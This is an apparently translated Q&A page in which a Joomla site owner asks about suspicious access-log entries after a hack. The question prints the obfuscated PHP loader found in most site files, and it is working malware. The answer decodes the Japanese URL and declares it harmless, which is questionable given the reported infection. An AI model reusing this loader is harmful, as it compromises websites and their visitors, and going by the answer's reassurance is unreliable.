我的一个Joomla网站被黑了。我已从文件中删除了所有恶意代码。
但我的access.log仍有一些像这样的条目:
66.249.64.200 - - [01/Mar/2017:00:55:45 +0530] "GET /conure/aerobiotic/6064/14419/lymphadenosis/deionize/calla/%EF%BC%91%E5%8F%B0%E5%88%86%E3%82%A8%E3%82%B9%E3%83%9A%E3%83%AA%E3%82%A2ACTIVE%E3%82%B9%E3%83%BC%E3%83%91%E3%83%BC%E3%83%80%E3%82%A6%E3%83%B3%E3%82%B3%E3%82%A4%E3%83%AB%E3%82%B9%E3%83%97%E3%83%AA%E3%83%B3%E3%82%B0/cth.
我该怎么做?
更新: 大多数站点文件都有这个代码:
<?php $ajwlfdcsu = '%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9n%<#372]58y]472]37y]672]f{jt)!gj!<*2bd%-#1GO x22#)fepmqyfAmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452svufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]8#/#M5]DgP5]D6#<%fdy>#]D4]275]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.9844- x24gvodujpo! x24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)%./#@#/qp%>5h%!<*::::::-111112k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/f x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7PNFS&d_SFSFGFS`QUUI&rd($n)-1);} @error_reporting(0); $eyicfuo = ifubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<fm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*but`cpV x7f x7f x7f x7f<u%V x27{ftmfV7R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&;!osvufs} x7f;!b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%w)gj6<^#Y# x5cq% x27Y%6<.bozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#w)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56986<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fwepnbss!>!bssbz)#44ec:649#-!#:618dif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!isset($GL}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x2x61"])))) { $GLOBALS[" x61 156 x75 1568y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvy]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opiubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyut)tpqssutRe%)Rd%)Rb%))!tf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-," x61 156 x64 162 x6f 151 xAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,2x24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]5]43]321]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x53]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]2%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpus%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x22Z;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtj)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#trstr($uas," x72 166 x3a 61 x31")) or (strstr($uas57 x78"))) { $fvspigj6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+ x24*<!%t::!>! x24Ypp3)%cB%iNuas," x66 151 x72 145 x66 14- x24-!% x24- x24*!|! x24- x24 x5c%j^ x61"]=1; $uas=strtolower($_S#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#]88]5]48]32M3]317]445]212]44judovg!|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% 75 156 x63 164 x69 157 x6e"; function pbfboor($n){return chr(o! x27!hmg%)!gj!~<ofmy%,3,j%>j%x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gp6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7g%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)msv`ftsbqA7>q%6< x7fw6* x7f_*# x7f<*X&Z&S{ftmfV x7f<*X}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}+3,j%>j%!*3! x27!hmg%!)!gjmplode(array_map("pbfboor",str_split("%tjw!>!#]y84]>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%x41 107 x45 116 x54"]); if ((strstr($uas," x6d 163 x69 145")) or (s!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hm57]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:o x24- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x2ERVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 pi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt = " x63 162 x65 141 x74 145 x5f 146 xb% x7f!<X>b%Z<#opo#>b%!*##>>gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbss%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%}#-! x24/%tmw/ x24)%c*W%eN+#Qi x5c1^W%c!>!jRk3`{666~6<&w6< x7fw6*CW&)7g.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*iopjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439svufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)us72qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<*Y%)fn275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:sutcvt)esp>hmg%!<12>j%!|!*#91OBALS[" x61 156 x75 156 %bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4j6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;ut275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuho!>! x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%5:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]K4]6!<2,*j%!-#1]#-bubE{h%)tpqsut>jtbc x7f!|!*uyfu x27k:!ftmf!}]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<b!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FU:75983:48984:71]K9]77]D4]82]K#>m%:|:*r%:-t%)3of:opjudovg<~ x24<!%o:!>! x242178}527w2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fm.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)fepdof!-#jt0*?]+^?]_ x5c}X x24<!%tmw!>!#]y84]275]y83]27*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujo3]D6P2L5P6]y6gP7L6M7]%}U;y]}R;2]},;osvufs} x27;mnui}&;D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;quui#>27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbeX)!gjZ<#opo#>b%!**X)ufttj x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-64")) or (strstr($uas," x63 150 x72 157 x6d 145")) or (strstr($!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!o;* x7f!>> x22!pd%)!gj}Z;h!opjudovgd%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osvufs}wc_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! xw6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA x27pd%6<C x27pd%6|so!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%ty38#-!%w:**<")));$xabwuqv = $fvspigj("", $eyicfuo); $xabwuqv();}}}{;#)tutjyf`opjudovg)!gj!|!*msv%)}uyfu%)3of)fepdof`57fStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtScugucngakh'; $hqlapc=explode(chr((637-517)),substr($ajwlfdcsu,(27145-21125),(230-196))); $vsldyu = $hqlapc[0]($hqlapc[(6-5)]); $ucggmim = $hqlapc[0]($hqlapc[(9-7)]); if (!function_exists('ugnpho')) { function ugnpho($fxjtykhlos, $qgxlcctuo,$fuzdrgk) { $tmhrwbd = NULL; for($xdounsoq=0;$xdounsoq<(sizeof($fxjtykhlos)/2);$xdounsoq++) { $tmhrwbd .= substr($qgxlcctuo, $fxjtykhlos[($xdounsoq*2)],$fxjtykhlos[($xdounsoq*2)+(4-3)]); } return $fuzdrgk(chr((62-53)),chr((349-257)),$tmhrwbd); }; } $oupzhybp = explode(chr((275-231)),'1282,70,4255,24,1393,38,2733,29,3627,48,3341,67,2480,50,1809,28,5477,63,2667,27,2530,21,3715,38,2873,62,683,45,3255,51,4174,52,4500,65,5807,51,1694,37,612,51,1633,61,1185,64,3009,70,2295,41,4123,51,1072,44,1569,64,1048,24,3115,30,728,60,3943,70,5610,59,4986,67,3914,29,4388,56,3675,40,3169,61,5669,45,5576,34,5966,34,509,69,3230,25,4635,30,0,52,2935,30,3408,59,3079,36,4226,29,1512,57,2821,52,2965,44,76,34,5298,60,4882,55,480,29,2421,59,2604,34,578,34,2167,41,1731,24,3781,47,4725,41,663,20,5714,36,3753,28,5414,63,6000,20,4665,28,2336,44,917,66,4013,68,4444,56,788,48,5540,36,4081,42,836,37,3145,24,1837,59,873,44,158,59,5074,33,5750,57,5358,56,4937,49,2069,48,3467,56,282,46,1431,46,2208,37,52,24,1952,56,4795,53,1352,41,2694,39,1896,56,4343,45,3583,44,413,67,3523,60,2638,29,3872,42,3828,44,1249,33,1477,35,5858,43,110,48,2380,41,1116,69,4565,70,355,58,4766,29,2551,53,328,27,5053,21,5107,68,4693,32,4279,64,2117,50,217,65,2793,28,2008,61,5175,56,2245,50,3306,35,983,65,4848,34,1755,54,2762,31,5231,67,5901,65'); $umtfepxsu = $vsldyu("",ugnpho($oupzhybp,$ajwlfdcsu,$ucggmim)); $vsldyu=$ajwlfdcsu; $umtfepxsu(""); $umtfepxsu=(557-436); $ajwlfdcsu=$umtfepxsu-1; ?><?php
答案 0 :(得分:0)
这是URL编码,只是日语,而不是恶意脚本。
基本上,来自IP地址66.249.64.200的访问者在2017年3月1日00:55:45访问了您的网站,GMT偏移为5小时30分钟(与India相关)。
他们试图从网址中检索数据:
/conure/aerobiotic/6064/14419/lymphadenosis/deionize/calla/1台分エスペリアACTIVEスーパーダウンコイルスプリング/cth.
网址编码的日语字面意思转换为:
One car for Hesperia ACTIVE Super Down Coil Spring
假设您的网站上不存在该网页,他们只会得到一个404.即使页面存在,它也只会显示该页面;绝对没有任何恶意可以担心:)
希望这有帮助!